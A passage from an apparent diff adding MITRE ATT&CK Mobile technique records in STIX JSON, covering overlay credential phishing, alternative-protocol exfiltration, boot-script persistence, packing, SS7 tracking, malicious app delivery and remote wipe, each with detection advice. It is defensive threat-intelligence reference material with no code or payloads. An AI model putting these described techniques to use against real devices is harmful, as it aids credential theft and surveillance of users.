can view and manage which applications hold the SYSTEM_ALERT_WINDOW permission to create overlay windows on top of other apps through the device settings in Apps & notifications -> Special app access -> Display over other apps (the exact menu location may vary between Android versions).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--3e091a89-a493-4a6c-8e88-d57be19bb98d", + "created": "2022-04-06T13:19:33.785Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1639", + "url": "https://attack.mitre.org/techniques/T1639" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-30.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-30" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nAlternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different protocol channels could also include Web services such as cloud storage. Adversaries may opt to also encrypt and/or obfuscate these alternate channels. ", + "modified": "2022-04-29T17:29:00.038Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Exfiltration Over Alternative Protocol", + "x_mitre_detection": "Exfiltration Over Alternative Protocols can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "phase_name": "exfiltration", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "id": "attack-pattern--45dcbc83-4abc-4de1-b643-e528d1e9df09", + "type": "attack-pattern", + "created": "2017-10-25T14:48:24.069Z", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "url": "https://attack.mitre.org/techniques/T1460", + "external_id": "T1460" + } + ], + "modified": "2018-10-17T01:05:10.703Z", + "name": "Biometric Spoofing", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-16T18:26:46.043Z", + "name": "Boot or Logon Initialization Scripts", + "description": "Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence. Initialization scripts are part of the underlying operating system and are not accessible to the user unless the device has been rooted or jailbroken. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "On Android, Verified Boot can detect unauthorized modifications to the system partition.(Citation: Android-VerifiedBoot) Android's SafetyNet API provides remote attestation capabilities, which could potentially be used to identify and respond to compromise devices. Samsung Knox provides a similar remote attestation capability on supported Samsung devices. ", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "2.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--46d818a5-67fa-4585-a7fc-ecf15376c8d5", + "created": "2017-10-25T14:48:31.294Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1398", + "external_id": "T1398" + }, + { + "source_name": "Android-VerifiedBoot", + "description": "Android. (n.d.). Verified Boot. Retrieved December 21, 2016.", + "url": "https://source.android.com/security/verifiedboot/" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-26.html", + "external_id": "APP-26" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html", + "external_id": "APP-27" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:44:26.317Z", + "name": "Execution Guardrails", + "description": "Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign. Values an adversary can provide about a target system or environment to use as guardrails may include environment information such as location.(Citation: SWB Exodus March 2019)\n\nGuardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [System Checks](https://attack.mitre.org/techniques/T1633/001). While use of [System Checks](https://attack.mitre.org/techniques/T1633/001) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Detecting the use of guardrails may be difficult depending on the implementation. Users can review which applications have location and sensitive phone information permissions in the operating system’s settings menu. Application vetting services can detect unnecessary and potentially permissions or API calls.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--498e7b81-238d-404c-aa5e-332904d63286", + "created": "2022-03-30T20:31:16.624Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1627", + "external_id": "T1627" + }, + { + "source_name": "SWB Exodus March 2019", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019.", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:55:51.676Z", + "name": "GUI Input Capture", + "description": "Adversaries may mimic common operating system GUI components to prompt users for sensitive information with a seemingly legitimate prompt. The operating system and installed applications often have legitimate needs to prompt the user for sensitive information such as account credentials, bank account information, or Personally Identifiable Information (PII). Compared to traditional PCs, the constrained display size of mobile devices may impair the ability to provide users with contextual information, making users more susceptible to this technique’s use.(Citation: Felt-PhishingOnMobileDevices)\n\nThere are several approaches adversaries may use to mimic this functionality. Adversaries may impersonate the identity of a legitimate application (e.g. use the same application name and/or icon) and, when installed on the device, may prompt the user for sensitive information.(Citation: eset-finance) Adversaries may also send fake device notifications to the user that may trigger the display of an input prompt when clicked.(Citation: Group IB Gustuff Mar 2019) \n\nAdditionally, adversaries may display a prompt on top of a running, legitimate application to trick users into entering sensitive information into a malicious application rather than the legitimate application. Typically, adversaries need to know when the targeted application and the individual activity within the targeted application is running in the foreground to display the prompt at the proper time. Adversaries can abuse Android’s accessibility features to determine which application is currently in the foreground.(Citation: ThreatFabric Cerberus) Two known approaches to displaying a prompt include:\n\n* Adversaries start a new activity on top of a running legitimate application.(Citation: Felt-PhishingOnMobileDevices)(Citation: Hassell-ExploitingAndroid) Android 10 places new restrictions on the ability for an application to start a new activity on top of another application, which may make it more difficult for adversaries to utilize this technique.(Citation: Android Background)\n* Adversaries create an application overlay window on top of a running legitimate application. Applications must hold the `SYSTEM_ALERT_WINDOW` permission to create overlay windows. This permission is handled differently than typical Android permissions and, at least under certain conditions, is automatically granted to applications installed from the Google Play Store.(Citation: Cloak and Dagger)(Citation: NowSecure Android Overlay)(Citation: Skycure-Accessibility) The `SYSTEM_ALERT_WINDOW` permission and its associated ability to create application overlay windows are expected to be deprecated in a future release of Android in favor of a new API.(Citation: XDA Bubbles)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Android users can view and manage which applications hold the `SYSTEM_ALERT_WINDOW` permission through the device settings in Apps & notifications -> Special app access -> Display over other apps (the exact menu location may vary between Android versions). \n\nApplication vetting services can look for applications requesting the `android.permission.SYSTEM_ALERT_WINDOW` permission in the list of permissions in the app manifest. ", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "created": "2022-04-05T19:48:31.195Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1417/002", + "external_id": "T1417.002" + }, + { + "source_name": "Felt-PhishingOnMobileDevices", + "description": "A.P. Felt and D. Wagner. (2011, May 26). Phishing on Mobile Devices. Retrieved August 25, 2016.", + "url": "http://w2spconf.com/2011/papers/felt-mobilephishing.pdf" + }, + { + "source_name": "Android Background", + "description": "Android Developers. (n.d.). Restrictions on starting activities from the background. Retrieved September 18, 2019.", + "url": "https://developer.android.com/guide/components/activities/background-starts" + }, + { + "source_name": "Cloak and Dagger", + "description": "Fratantonio, Y., et al.. (2017). Cloak & Dagger. Retrieved September 18, 2019.", + "url": "http://cloak-and-dagger.org/" + }, + { + "source_name": "Group IB Gustuff Mar 2019", + "description": "Group-IB. (2019, March 28). Group-IB uncovers Android Trojan named «Gustuff» capable of targeting more than 100 global banking apps, cryptocurrency and marketplace applications. Retrieved September 3, 2019.", + "url": "https://www.group-ib.com/blog/gustuff" + }, + { + "source_name": "eset-finance", + "description": "Lukáš Štefanko. (2016, July 7). Fake finance apps on Google Play target users from around the world. Retrieved September 24, 2018.", + "url": "https://www.welivesecurity.com/2018/09/19/fake-finance-apps-google-play-target-around-world/" + }, + { + "source_name": "Hassell-ExploitingAndroid", + "description": "R. Hassell. (2011, October 12-13). Exploiting Androids for Fun and Profit. Retrieved October 10, 2019.", + "url": "https://conference.hitb.org/hitbsecconf2011kul/materials/D1T1%20-%20Riley%20Hassell%20-%20Exploiting%20Androids%20for%20Fun%20and%20Profit.pdf" + }, + { + "source_name": "XDA Bubbles", + "description": "Rahman, M.. (2019, May 8). Bubbles in Android Q will fully replace the overlay API in a future Android version. Retrieved September 18, 2019.", + "url": "https://www.xda-developers.com/android-q-system-alert-window-deprecate-bubbles/" + }, + { + "source_name": "NowSecure Android Overlay", + "description": "Ramirez, T.. (2017, May 25). ‘SAW’-ing through the UI: Android overlay malware and the System Alert Window permission explained. Retrieved September 18, 2019.", + "url": "https://www.nowsecure.com/blog/2017/05/25/android-overlay-malware-system-alert-window-permission/" + }, + { + "source_name": "ThreatFabric Cerberus", + "description": "ThreatFabric. (2019, August). Cerberus - A new banking Trojan from the underworld. Retrieved September 18, 2019.", + "url": "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html" + }, + { + "source_name": "Skycure-Accessibility", + "description": "Yair Amit. (2016, March 3). “Accessibility Clickjacking” – The Next Evolution in Android Malware that Impacts More Than 500 Million Devices. Retrieved December 21, 2016.", + "url": "https://www.skycure.com/blog/accessibility-clickjacking/" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-31.html", + "external_id": "APP-31" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--4e6620ac-c30c-4f6d-918e-fa20cae7c1ce", + "created": "2017-10-25T14:48:11.535Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1432", + "url": "https://attack.mitre.org/techniques/T1432" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-13" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "An adversary could call standard operating system APIs from a malicious application to gather contact list (i.e., address book) data, or with escalated privileges could directly access files containing contact list data.", + "modified": "2022-04-01T13:19:41.180Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Access Contact List", + "x_mitre_detection": "On both Android (6.0 and up) and iOS, the user can view which applications have permission to access contact list information through the device settings screen, and the user can choose to revoke the permissions.", + "kill_chain_phases": [ + { + "phase_name": "collection", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T15:20:11.752Z", + "name": "Compromise Client Software Binary", + "description": "Adversaries may modify system software binaries to establish persistent access to devices. System software binaries are used by the underlying operating system and users over adb or terminal emulators. \n\nAdversaries may make modifications to client software binaries to carry out malicious tasks when those binaries are executed. For example, malware may come with a pre-compiled malicious binary intended to overwrite the genuine one on the device. Since these binaries may be routinely executed by the system or user, the adversary can leverage this for persistent access to the device. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Verified Boot can detect unauthorized modifications to the system partition.(Citation: Android-VerifiedBoot) Android’s SafetyNet API provides remote attestation capabilities, which could potentially be used to identify and respond to compromised devices. Samsung Knox provides a similar remote attestation capability on supported Samsung devices. Application vetting services could detect applications trying to modify files in protected parts of the operating system.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--4f14e30b-8b57-4a7b-9093-2c0778ea99cf", + "created": "2022-03-30T19:53:27.791Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1645", + "external_id": "T1645" + }, + { + "source_name": "Android-VerifiedBoot", + "description": "Android. (n.d.). Verified Boot. Retrieved December 21, 2016.", + "url": "https://source.android.com/security/verifiedboot/" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html", + "external_id": "APP-27" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:54:40.501Z", + "name": "Software Packing", + "description": "Adversaries may perform software packing to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. \n\nUtilities used to perform software packing are called packers. An example packer is FTT. A more comprehensive list of known packers is available, but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services could look for known software packers or artifacts of packing techniques. Packing is not a definitive indicator of malicious activity, because as legitimate software may use packing techniques to reduce binary size or to protect proprietary code.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "iOS", + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--51636761-2e35-44bf-9e56-e337adf97174", + "created": "2022-03-30T19:20:37.864Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1406/002", + "external_id": "T1406.002" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "id": "attack-pattern--51aedbd6-2837-4d15-aeb0-cb09f2bf22ac", + "type": "attack-pattern", + "created": "2017-10-25T14:48:16.288Z", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "url": "https://attack.mitre.org/techniques/T1445", + "external_id": "T1445" + } + ], + "modified": "2018-10-17T01:05:10.701Z", + "name": "Abuse of iOS Enterprise App Signing Key", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--52651225-0b3a-482d-aa7e-10618fd063b5", + "created": "2017-10-25T14:48:09.864Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1450", + "url": "https://attack.mitre.org/techniques/T1450" + }, + { + "source_name": "3GPP-Security", + "url": "http://www.3gpp.org/ftp/tsg_sa/wg3_security/_specs/33900-120.pdf", + "description": "3GPP. (2000, January). A Guide to 3rd Generation Security. Retrieved December 19, 2016." + }, + { + "source_name": "CSRIC5-WG10-FinalReport", + "url": "https://www.fcc.gov/files/csric5-wg10-finalreport031517pdf", + "description": "Communications Security, Reliability, Interoperability Council (CSRIC). (2017, March). Working Group 10 Legacy Systems Risk Reductions Final Report. Retrieved May 24, 2017." + }, + { + "source_name": "CSRIC-WG1-FinalReport", + "description": "CSRIC-WG1-FinalReport" + }, + { + "source_name": "Positive-SS7", + "url": "https://www.ptsecurity.com/upload/ptcom/PT-SS7-AD-Data-Sheet-eng.pdf", + "description": "Positive Technologies. (n.d.). SS7 Attack Discovery. Retrieved December 19, 2016." + }, + { + "source_name": "Engel-SS7-2008", + "url": "https://www.youtube.com/watch?v=q0n5ySqbfdI", + "description": "Tobias Engel. (2008, December). Locating Mobile Phones using SS7. Retrieved December 19, 2016." + }, + { + "source_name": "Engel-SS7", + "url": "https://berlin.ccc.de/~tobias/31c3-ss7-locate-track-manipulate.pdf", + "description": "Tobias Engel. (2014, December). SS7: Locate. Track. Manipulate.. Retrieved December 19, 2016." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-38.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "CEL-38" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "An adversary could exploit signaling system vulnerabilities to track the location of mobile devices. (Citation: Engel-SS7) (Citation: Engel-SS7-2008) (Citation: 3GPP-Security) (Citation: Positive-SS7) (Citation: CSRIC5-WG10-FinalReport)", + "modified": "2022-04-05T19:54:12.657Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Exploit SS7 to Track Device Location", + "x_mitre_detection": "Network carriers may be able to use firewalls, Intrusion Detection Systems (IDS), or Intrusion Prevention Systems (IPS) to detect and/or block SS7 exploitation.(Citation: CSRIC-WG1-FinalReport) The CSRIC also suggests threat information sharing between telecommunications industry members.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "network-effects" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Without Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--52eff1c7-dd30-4121-b762-24ae6fa61bbb", + "created": "2020-04-28T14:35:37.309Z", + "x_mitre_version": "2.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1575", + "url": "https://attack.mitre.org/techniques/T1575" + }, + { + "source_name": "Google NDK Getting Started", + "url": "https://developer.android.com/ndk/guides", + "description": "Google. (2019, December 27). Getting Started with the NDK. Retrieved April 28, 2020." + }, + { + "source_name": "MITRE App Vetting Effectiveness", + "url": "https://www.mitre.org/sites/default/files/publications/pr-16-4772-analyzing-effectiveness-mobile-app-vetting-tools-report.pdf", + "description": "M. Peck, C. Northern. (2016, August 22). Analyzing the Effectiveness of App Vetting Tools in the Enterprise. Retrieved April 28, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may use Android’s Native Development Kit (NDK) to write native functions that can achieve execution of binaries or functions. Like system calls on a traditional desktop operating system, native code achieves execution on a lower level than normal Android SDK calls.\n\nThe NDK allows developers to write native code in C or C++ that is compiled directly to machine code, avoiding all intermediate languages and steps in compilation that higher level languages, like Java, typically have. The Java Native Interface (JNI) is the component that allows Java functions in the Android app to call functions in a native library.(Citation: Google NDK Getting Started)\n\nAdversaries may also choose to use native functions to execute malicious code since native actions are typically much more difficult to analyze than standard, non-native behaviors.(Citation: MITRE App Vetting Effectiveness)", + "modified": "2022-04-08T15:46:24.495Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Native API", + "x_mitre_detection": "This is abuse of standard OS-level APIs and are therefore typically undetectable to the end user.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "execution" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--53263a67-075e-48fa-974b-91c5b5445db7", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "1.2", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1476", + "url": "https://attack.mitre.org/techniques/T1476" + }, + { + "source_name": "IBTimes-ThirdParty", + "url": "https://www.ibtimes.co.uk/danger-lurks-third-party-android-app-stores-1544861", + "description": "A Prasad. (2016, February 19). Danger lurks in third-party Android app stores. Retrieved November 8, 2018." + }, + { + "source_name": "TrendMicro-RootingMalware", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/user-beware-rooting-malware-found-in-3rd-party-app-stores/", + "description": "Jordan Pan. (2016, February 10). User Beware: Rooting Malware Found in 3rd Party App Stores. Retrieved November 8, 2018." + }, + { + "source_name": "android-trojan-steals-paypal-2fa", + "url": "https://www.welivesecurity.com/2018/12/11/android-trojan-steals-money-paypal-accounts-2fa/", + "description": "Lukáš Štefanko. (2018, December 11). Android Trojan steals money from PayPal accounts even with 2FA on. Retrieved July 11, 2019." + }, + { + "source_name": "TrendMicro-FlappyBird", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/flappy-bird-and-third-party-app-stores/", + "description": "Veo Zhang. (2014, February 18). Flappy Bird and Third-Party App Stores. Retrieved November 8, 2018." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-9.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "AUT-9" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-13.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "ECO-13" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-21.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "ECO-21" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "Malicious applications are a common attack vector used by adversaries to gain a presence on mobile devices. This technique describes installing a malicious application on targeted mobile devices without involving an authorized app store (e.g., Google Play Store or Apple App Store). Adversaries may wish to avoid placing malicious applications in an authorized app store due to increased potential risk of detection or other reasons. However, mobile devices often are configured to allow application installation only from an authorized app store which would prevent this technique from working.\n\nDelivery methods for the malicious application include:\n\n* [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) - Including the mobile app package as an attachment to an email message.\n* [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) - Including a link to the mobile app package within an email, text message (e.g. SMS, iMessage, Hangouts, WhatsApp, etc.), web site, QR code, or other means.\n* Third-Party App Store - Installed from a third-party app store (as opposed to an authorized app store that the device implicitly trusts as part of its default behavior), which may not apply the same level of scrutiny to apps as applied by an authorized app store.(Citation: IBTimes-ThirdParty)(Citation: TrendMicro-RootingMalware)(Citation: TrendMicro-FlappyBird)\n\nSome Android malware comes with functionality to install additional applications, either automatically or when the adversary instructs it to.(Citation: android-trojan-steals-paypal-2fa)", + "modified": "2022-04-06T15:41:16.863Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Deliver Malicious App via Other Means", + "x_mitre_detection": "* An EMM/MDM or mobile threat defense solution may be able to identify the presence of apps installed from sources other than an authorized app store. \n* An EMM/MDM or mobile threat defense solution may be able to identify Android devices configured to allow apps to be installed from \"Unknown Sources\".\n* Enterprise email security solutions can identify the presence of Android or iOS application packages within email messages.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--537ea573-8a1c-468c-956b-d16d2ed9d067", + "created": "2017-10-25T14:48:07.827Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1469", + "url": "https://attack.mitre.org/techniques/T1469" + }, + { + "source_name": "Honan-Hacking", + "url": "https://www.wired.com/2012/08/apple-amazon-mat-honan-hacking/", + "description": "Mat Honan. (2012, August 6). How Apple and Amazon Security Flaws Led to My Epic Hacking. Retrieved December 29, 2016." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-5.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "ECO-5" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/emm-threats/EMM-7.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "EMM-7" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "An adversary who is able to obtain unauthorized access to or misuse authorized access to cloud services (e.g. Google's Android Device Manager or Apple iCloud's Find my iPhone) or to an EMM console could use that access to wipe enrolled devices (Citation: Honan-Hacking).", + "modified": "2022-04-06T15:54:28.187Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Remotely Wipe Data Without Authorization", + "x_mitre_detection": "Google provides the ability for users to view their general account activity. Apple iCloud also provides notifications to users of account activity.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "remote-service-effects" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Without Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:57:14.285Z", + "name": "Proxy Through Victim", + "description": "Adversaries may use a compromised device as a proxy server to the Internet. By utilizing a proxy, adversaries hide the true IP address of their C2 server and associated infrastructure from the destination of the network traffic. This masquerades an adversary’s traffic as legitimate traffic originating from the compromised device, 